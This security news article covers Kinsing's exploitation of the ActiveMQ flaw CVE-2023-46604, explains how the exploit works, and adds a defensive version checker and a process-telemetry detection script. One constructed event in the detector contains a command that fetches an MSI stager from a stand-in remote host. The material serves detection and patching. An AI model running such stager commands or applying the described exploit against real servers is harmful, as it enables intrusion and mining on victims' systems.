The AhnLab Security Intelligence Center (ASEC) has confirmed that the Kinsing threat actor, also known as H2Miner, continues to actively exploit known vulnerabilities, particularly CVE-2023-46604 in Apache ActiveMQ, to distribute cryptocurrency miners and remote-access tools across both Linux and Windows systems.
The campaign has recently expanded beyond its usual cryptomining activity, now involving multiple post-exploitation frameworks such as Cobalt Strike, Meterpreter, and PowerShell Empire, alongside a new .NET-based backdoor named Sharpire.
First identified by Alibaba Cloud Security in 2020, Kinsing is known for targeting misconfigured or unpatched servers to deploy XMRig miners. Over the years, the group has adapted its tactics to exploit several major vulnerabilities, including Log4Shell (CVE-2021-44228), misconfigured Docker API ports, and now, ActiveMQ's remote code execution flaw (CVE-2023-46604).
AhnLab explains: "The Kinsing threat actor targets the Docker daemon API port with a misconfiguration, while for Redis, they exploit the remote code execution vulnerability. Other cases include the Log4j vulnerability (CVE-2021-44228) and the ActiveMQ vulnerability (CVE-2023-46604)."
Aside from vulnerability exploitation, Kinsing also leverages stolen SSH credentials during lateral movement to spread malware internally across compromised networks.
CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that lets an unauthenticated attacker who can reach the broker's OpenWire port (61616/tcp by default) run arbitrary commands on the server. The flaw lies in how the OpenWire protocol unmarshals exception responses: the broker instantiates whatever class name the attacker's packet supplies and passes it a string argument, and the public exploits use this to create a Spring ClassPathXmlApplicationContext that loads an attacker-hosted XML configuration defining the command to run. Apache fixed the issue in versions 5.15.16, 5.16.7, 5.17.6 and 5.18.3.
AhnLab's analysts noted that "if an unpatched Apache ActiveMQ server is exposed to the Internet, threat actors can remotely execute malicious commands and take control of the system." The vulnerability has already been exploited by several major groups, including Andariel, HelloKitty ransomware, and Mauri ransomware, but AhnLab's latest research highlights Kinsing's continued and evolving use of the exploit.
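The practical check an exposed-broker owner wants is whether the running version predates the fix. The script below is an added example, not code from AhnLab or the Apache ActiveMQ project: it reads the ProviderVersion string that an ActiveMQ broker advertises in the OpenWire WireFormatInfo packet it sends on connect (the same fingerprint that version scanners rely on) and compares it against the fixed versions named in the Apache advisory. The packet bytes used for the sample run are constructed here, the field layout it assumes (key bytes, a one-byte type tag of 9 for String, then a 2-byte length-prefixed UTF-8 string) follows OpenWire's primitive-map marshalling, and the live-probe helper assumes the broker sends the banner unsolicited.

```python
import re
import socket

# Minimum fixed version on each ActiveMQ release line named in the Apache
# advisory for CVE-2023-46604.
FIXED_VERSIONS = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}

OPENWIRE_STRING_TYPE = 9  # type tag OpenWire uses for a String map value (assumed layout)


def parse_version(text):
    """'5.18.2' -> (5, 18, 2); trailing suffixes such as '-SNAPSHOT' are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version):
    """True when the version predates the fix on its release line."""
    line = version[:2]
    if line in FIXED_VERSIONS:
        return version < FIXED_VERSIONS[line]
    # Lines older than 5.15 were never patched; lines newer than 5.18
    # were released after the fix.
    return version < (5, 15, 0)


def provider_version_from_banner(banner):
    """Extract ProviderVersion from a WireFormatInfo packet.

    Assumes OpenWire's primitive-map encoding: the key bytes are followed by
    a one-byte type tag (9 = String) and a 2-byte big-endian length-prefixed
    UTF-8 string. Returns None if the key or the expected layout is absent.
    """
    key = b"ProviderVersion"
    idx = banner.find(key)
    if idx < 0:
        return None
    pos = idx + len(key)
    if pos + 3 > len(banner) or banner[pos] != OPENWIRE_STRING_TYPE:
        return None
    length = int.from_bytes(banner[pos + 1:pos + 3], "big")
    value = banner[pos + 3:pos + 3 + length]
    if len(value) != length:
        return None
    return value.decode("utf-8", "replace")


def assess_banner(banner):
    """None if no version could be read, else the vulnerability verdict."""
    version = provider_version_from_banner(banner)
    if version is None:
        return None
    return is_vulnerable(parse_version(version))


def build_sample_banner(version):
    """Constructed test packet (not a byte-exact capture): length prefix,
    WireFormatInfo command type 1, magic 'ActiveMQ', protocol version,
    then a one-entry property map carrying ProviderVersion."""
    v = version.encode()
    key = b"ProviderVersion"
    entry = (len(key).to_bytes(2, "big") + key
             + bytes([OPENWIRE_STRING_TYPE]) + len(v).to_bytes(2, "big") + v)
    body = (b"\x01" + b"ActiveMQ" + (12).to_bytes(4, "big")
            + b"\x01" + (1).to_bytes(4, "big") + entry)
    return len(body).to_bytes(4, "big") + body


def fetch_banner(host, port=61616, timeout=5.0):
    """Read the WireFormatInfo the broker sends on connect (needs network
    access; the sample run below uses the constructed packet instead)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(4096)


if __name__ == "__main__":
    for sample in ("5.18.2", "5.18.3", "5.14.5"):
        verdict = assess_banner(build_sample_banner(sample))
        print(f"ActiveMQ {sample}: {'VULNERABLE' if verdict else 'fixed'}")
```

Against a real broker, replace the constructed packet with `fetch_banner(host)`; a None result means the banner did not carry a readable version and the host needs checking by other means rather than being assumed safe.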
In recent attacks observed in South Korea, Kinsing has deployed a chain of downloader malware to deliver secondary payloads. The infection begins when the exploited ActiveMQ Java process loads the attacker's XML configuration, which launches msiexec.exe to download and install an MSI package from the attacker's server. These "stager" components establish persistence and connect back to the attacker's infrastructure for further payload delivery.
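The chain described above has a distinctive shape in process telemetry: a broker's Java process spawning msiexec.exe with a remote package URL. The detection logic below is an added example, not code from AhnLab's report, and runs over constructed Sysmon-style process-creation events (the host names, paths and the 203.0.113.10 address are made up for illustration). It flags java.exe spawning msiexec.exe as high severity when the command line names a remote package, and, as a broader catch for the arbitrary-command execution the exploit gives, java.exe spawning a shell at medium severity.

```python
import re

# Constructed Sysmon-style process-creation events, not real telemetry.
SAMPLE_EVENTS = [
    {   # normal broker start under the service wrapper: benign
        "host": "mq-01",
        "parent_image": r"C:\ActiveMQ\bin\win64\wrapper.exe",
        "image": r"C:\Program Files\Java\jre\bin\java.exe",
        "command_line": "java.exe org.apache.activemq.console.Main start",
    },
    {   # exploited broker pulling an MSI stager from a remote host
        "host": "mq-01",
        "parent_image": r"C:\Program Files\Java\jre\bin\java.exe",
        "image": r"C:\Windows\System32\msiexec.exe",
        "command_line": "msiexec.exe /q /i http://203.0.113.10/stager.msi",
    },
    {   # an administrator installing a local package: benign
        "host": "ws-07",
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\msiexec.exe",
        "command_line": r"msiexec.exe /i C:\Users\admin\Downloads\7zip.msi",
    },
    {   # broker spawning a shell: suspicious on an app server
        "host": "mq-02",
        "parent_image": r"C:\Program Files\Java\jre\bin\java.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd.exe /c whoami",
    },
]

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
JAVA_IMAGES = {"java.exe", "javaw.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def image_name(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (severity, reason) for a suspicious event, else None."""
    parent = image_name(event["parent_image"])
    child = image_name(event["image"])
    cmd = event.get("command_line", "")
    if parent not in JAVA_IMAGES:
        return None
    if child == "msiexec.exe":
        urls = URL_RE.findall(cmd)
        if urls:
            return ("high", f"java spawned msiexec.exe installing remote package {urls[0]}")
        return ("medium", "java spawned msiexec.exe")
    if child in SHELL_IMAGES:
        return ("medium", f"java spawned {child}")
    return None


def scan(events):
    """Run classify over a batch and return (host, severity, reason) hits."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            hits.append((ev["host"], verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for host, severity, reason in scan(SAMPLE_EVENTS):
        print(f"[{severity.upper()}] {host}: {reason}")
```

On a real estate the parent match should also cover the service wrapper a given ActiveMQ installation uses, and the URL rule should be paired with the broker's own network logs, since the same exploit can just as easily fetch its stager with certutil or PowerShell instead of msiexec.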
The Kinsing operation continues to maintain cross-platform capabilities. In addition to the Windows-based malware chain, AhnLab identified a Bash script targeting Linux environments, designed to configure the XMRig miner for illicit cryptocurrency mining. The script modifies the miner's configuration file to include Kinsing's wallet address, as confirmed by AhnLab's telemetry and previous Fortinet research.
Perhaps the most notable finding in AhnLab's report is the identification of Sharpire, a .NET-based backdoor that acts as an agent for PowerShell Empire, an open-source post-exploitation framework. Sharpire expands Kinsing's toolkit for remote control, reconnaissance, and lateral movement.
AhnLab's analysis shows that Sharpire can execute PowerShell commands, manage files, query network configurations, and even reboot or shut down compromised systems.
The malware supports over a dozen command functions, including "Execute PowerShell command," "List directory," "Check network configuration information," and "Query current user."
By integrating Cobalt Strike, Meterpreter, and Sharpire, Kinsing now exhibits capabilities more aligned with multi-stage intrusion and ransomware operators, signaling a clear escalation in threat sophistication.